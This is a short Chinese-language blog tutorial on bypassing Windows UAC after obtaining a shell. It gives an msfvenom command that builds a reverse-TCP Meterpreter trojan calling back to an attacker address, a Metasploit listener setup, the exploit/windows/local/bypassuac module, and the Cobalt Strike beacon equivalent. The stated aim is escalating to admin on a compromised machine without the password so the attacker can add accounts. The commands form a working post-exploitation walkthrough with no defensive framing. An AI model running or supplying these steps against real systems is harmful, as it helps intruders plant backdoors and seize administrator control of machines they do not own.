Windows下bypassuac

  1. uac
  2. Msf bypassuac
  3. cobalt strike bypassuac

一直都搞不懂bypassuac是啥,到底有啥用啊,后来经过高人的指点,突然之间就悟了!

uac

有的时候我们拿了一个shell,不晓得管理员的密码,3389也打不开是不是很操刀!就像这样

这个问题是要用管理员打开cmd才能添加账号


这个时候我们就要绕过windows的uac策略了

Msf bypassuac

1
2
3
4
5
6
7
8
9
#生成一个木马文件,放到目标机器上面
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.128 --platform windows lport=4444 -f exe > uac.exe

#打开msfconsole,设置监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.43.128
run
#然后在目标机器上面运行传上去的木马文件

这个时候我们拿到了meterpreter

getsystem是有问题的,说明不是最高权限

这个时候我们返回msf控制台,并保留session

1
background

1
2
3
4
#设置uac的payload
use exploit/windows/local/bypassuac
set session 3
run


这个时候getsystem应该没有问题了

bypassuac成功,可以添加用户了

cobalt strike bypassuac


一样的,首先生成一个后门木马,上传到目标机器上面,并且运行

看到这里有回显了,右键进入beacon,输入bypassuac

然后设置好监听的端口,输入命令

就成功啦~


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:Windows下bypassuac

本文作者:sher10ck

发布时间:2019-11-08, 19:27:00

最后更新:2020-01-13, 12:49:31

原始链接:http://sherlocz.github.io/2019/11/08/Windows下bypassuac/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录